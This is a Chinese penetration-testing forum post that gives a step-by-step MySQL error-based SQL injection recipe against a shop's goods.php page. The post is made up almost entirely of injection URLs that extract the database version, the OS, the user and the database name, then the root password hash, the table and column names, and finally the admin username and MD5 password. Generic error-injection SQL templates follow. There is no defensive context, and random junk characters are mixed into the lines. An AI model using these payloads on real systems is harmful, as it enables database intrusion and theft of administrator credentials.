找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2072|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 % p. O/ X6 r% H+ d# Z
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23. L& G" u8 u! ]4 L
( E- ~3 b+ h7 t+ [$ K1 f1 Z
判断系统( P( L3 ^0 K1 p! o0 J
$ w, a" L9 I% x( c+ r4 V
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
- j* }' o# M4 g
7 _% G. ^7 d) s1 [. X7 n3 r" `$ P2 l" }# F6 u
$ D( ]8 F+ |3 b' P' g" c
当前 user()9 A9 a; E- M. d' G; r7 z
; q, P7 D, c$ Z; d
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
1 r$ A5 M7 Q* D6 x. m
# h* j6 v3 I3 i) i4 \, ?1 q' \- e& |5 J/ x% o

1 E+ X* l8 B2 f7 z3 B$ k4 O( J当前 database()* B- ?8 J# p  q0 g# e+ x
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
: y; }; Y0 A8 H# D( d
9 h$ Y! ], O! C5 N" B
- Z" n& H9 ]. N" v# N# s. ?
! H6 d+ ]. f6 |; x9 f1 Q8 L3 ~
1 D( x, k. ?1 R5 Y; r5 Broot hash9 N2 y- `7 i' c2 T+ E
# E$ S; L7 ?6 y1 P- O/ e+ |2 {$ y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%234 v# L, G( n* A: K4 w* Q

/ B' X# \1 f$ T. w5 w# V' G$ a3 u" w* L6 }4 T6 l1 U

8 h) i9 j8 W8 F5 k! D. P' `当前 数据库表名
6 D! a. f, w( y4 M( n0 D3 V( b  l+ W, T# w- Q/ I7 ]( v: b* d1 B
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23: E! |, B3 }6 E0 v+ e  M
# q3 U. J  A4 k  p4 ?

4 o/ ]( V  s( X% S6 M4 D
  u! p0 O8 I6 X当前 数据库 user_name 字段/ w# R, E; g4 t
* M9 D. {1 k( W# }; o1 z
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 J5 }# O! I, q& U% n% p: F0 y8 L7 e! h9 W! x
当前 数据库 字段 password
/ q/ c4 ~* U( _2 |  Z. a$ G9 S( nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%236 d: b2 y- _, b9 d  f) }' i2 ]

" y; P% o# k7 m' m3 d9 h2 E+ {7 \
- q, E) u& ^1 t9 A" G
获得 admin passwd(md5): v) Z, ?) T% d$ u9 o. ~, P

8 _% z; a$ c4 P& \9 h
5 `4 i9 @' u: Chttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
+ n+ S( `) `5 b+ u- [8 e) }' R7 I7 N9 B  e
报错注射
$ u8 e3 `; p( d5 L! QSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
" Z( I6 H1 E9 C. @' w) ^# A; c" Q3 {% q% {0 c8 c, C' V! M( A7 ~& ?
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
2 c5 J7 Y# V% G7 _  b$ t# F% I* d; k  a
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表